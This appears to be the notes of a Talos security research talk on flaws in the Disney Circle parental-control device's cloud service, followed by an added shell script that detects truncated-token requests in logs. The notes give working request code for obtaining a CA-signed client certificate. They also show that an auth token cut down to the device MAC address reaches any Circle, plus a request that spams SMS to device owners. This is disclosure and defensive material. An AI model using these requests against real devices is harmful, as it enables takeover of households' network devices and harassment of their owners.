Proxy output for the SSL connection (ASCII column of the hex dump, one group per 16-byte row):

    [>.>] Received Connection from ('192.168.2.104', 33392)
    Z....8CE2DAF23E1 3,00:00:00:00:00 :00 id= .... tag= v=2
    [>.>] Sent X bytes to remote ()
    Z...0.1
    [>.>] Sent 7 bytes to remote ()
    Z..]1.8CF2DAFABC 12-yB7abcdeZ9uKI nbm-20170721.192 325

Back to the questions:

- What happened to the home router's natural firewall/NAT? UDP Beacon->Reverse SSL Tunnel.
- How does the cloud know which home to hit?
- How does the father authenticate to the remote server???

We can actually answer these next two at the same time.

(At least on an Android phone) Upon initial configuration of the Disney Circle by the administrator, a base64 encoded PKCS12 blob is generated on the admin's phone, inside of a sqlite3 database in the /data partition of the phone.

    [email protected]<(^_^)>: openssl pkcs12 -in reroute.pkcs12
    Enter Import Password:
    MAC verified OK
    Bag Attributes
    [...]
        localKeyID: 63 0D C6 B8 2C FF FD 6F CF B0 73 71 EC FD A9 5A F4 7A EB 25
    subject=/C=US/ST=OR/L=Portland/O=Circle/OU=8CE2DAA12345eab5bdcac8123459f69d175546abcdef_CIRCLEHOME/CN=vpn.meetcircle.co
    issuer=/C=US/ST=OR/O=Circle/CN=Circle Go Intermediate Authority
    -----BEGIN CERTIFICATE-----
    [...]
    -----END CERTIFICATE-----
    Bag Attributes
        friendlyName: Circle
    subject=/C=US/ST=OR/O=Circle/CN=Circle Go Intermediate Authority
    issuer=/C=US/ST=OR/L=Portland/O=Circle/CN=Circle Go Root Certificate Authority
    -----BEGIN CERTIFICATE-----
    MIIFpTCCA42gAwIBAgICEAAwDQYJKoZIhvcNAQELBQAwbTE=[...]

In looking at the .smali that generates the request to get this particular certificate, we see this:

    import requests

    IP = "vpncc.meetcircle.co"
    # Fields the app sends when it asks for its client certificate
    data = {
        "gotoken": "12341234-<(^_^)>-lol-abcd-1234",
        "circleid": "8CE2DA1234AB",
        "devid": "eab5bdcac8123459f69d175546abcdef_CIRCLEHOME",
        "host": "vpn.meetcircle.co",
    }
    r = requests.post("http://%s:8089/api/CERT/clientCert?circleid=%s&gotoken=%s&devid=%s&host=%s"
                      % (IP, data["circleid"], data["gotoken"], data["devid"], data["host"]))

The above code resulted in a certificate as such:

    subject=/C=US/ST=OR/L=Portland/O=Circle/OU=8CE2DA1234AB-12341234-<(^_^)>-lol-abcd1234_CIRCLEHOME/CN=vpn.meetcircle.co

Hilariously, we could actually generate a certificate valid for any domain, and have it signed by the Meetcircle CA, as the only fields that mattered were the gotoken and circleid fields, the former of which was a UUID generated by an unknown hashing algorithm of the circleid....

And this made me sad, as it was a fair assumption to say that using the OU string for authentication and also for routing to the correct Circle would be a relatively safe and reliable way to make things work (assuming the hashing function wasn't guessed).

So there went my plan for bricking or rooting any Circle in the world with network connectivity...

But thankfully my assumption was wrong <(^_^)>

The only thing that determined which Circle is the destination was the token used in authentication...

    GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC12-yB7abcdeZ9uKInbm-20170721

Which unfortunately was impossible to generate or bruteforce normally.

But thankfully, you didn't need the complete token, the only thing that actually mattered was the first portion:

    GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC12

Btws, that's the MAC address of the device.

Besides the boring rooting and bricking of any Circle in the world, we could also spam a single text message to the admin of the device (lol).

    GET /api/PASSCODE/sms?api=1.0&token= HTTP/1.1
    Host: remote.meetcircle.co:45671
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept: */*
    User-Agent: python-requests/2.17.3

    [o.o] Sent 202 bytes to remote (45.79.169.242:45671)

Claudio was not happy about this one....

talosintelligence.com
blog.talosintel.com
@talossecurity

Lilith Wyatt <(^_^)> Vulndev Research Engineer.
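Seen from the server side, the truncated-token requests from the Cloud Routing slides stand out in request logs. The following added example (not Circle's code; the log format, the function names and the extra device IDs are constructed) flags requests whose token is not the full three-part value and counts distinct device IDs per client.

```shell
#!/bin/sh
# Added example. Constructed log lines in a hypothetical
# "<client-ip> <method> <url> <protocol>" format.
sample_log() {
cat <<'EOF'
203.0.113.10 GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC12-yB7abcdeZ9uKInbm-20170721 HTTP/1.1
198.51.100.7 GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC12 HTTP/1.1
198.51.100.7 GET /api/PASSCODE/sms?api=1.0&token=8CF2DAFABC13 HTTP/1.1
198.51.100.7 GET /api/QUERY/overall?api=1.0&token=8CF2DAFABC14-x HTTP/1.1
EOF
}

# Print "<client-ip> <path> <token>" for every request whose token is not
# <12 hex digits>-<secret>-<8 digit date>, the full form shown on the slide.
flag_truncated_tokens() {
    awk '{
        if (!match($3, /[?&]token=[^&]*/)) next
        tok = substr($3, RSTART + 7, RLENGTH - 7)
        n = split(tok, p, "-")
        ok = (n == 3 && length(p[1]) == 12 && p[1] ~ /^[0-9A-F]+$/ &&
              p[2] ~ /^[A-Za-z0-9]+$/ && length(p[3]) == 8 && p[3] ~ /^[0-9]+$/)
        if (!ok) { path = $3; sub(/\?.*/, "", path); print $1, path, tok }
    }' "$1"
}

# Print "<client-ip> <count>" of distinct device IDs (first 12 characters of
# the token) each client addressed; a single household is assumed to use few.
device_ids_per_client() {
    awk '{
        if (!match($3, /[?&]token=[^&]*/)) next
        id = substr($3, RSTART + 7, 12)
        if (!seen[$1, id]++) n[$1]++
    }
    END { for (ip in n) print ip, n[ip] }' "$1" | sort
}

log=$(mktemp)
sample_log > "$log"
flag_truncated_tokens "$log"
device_ids_per_client "$log"
```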
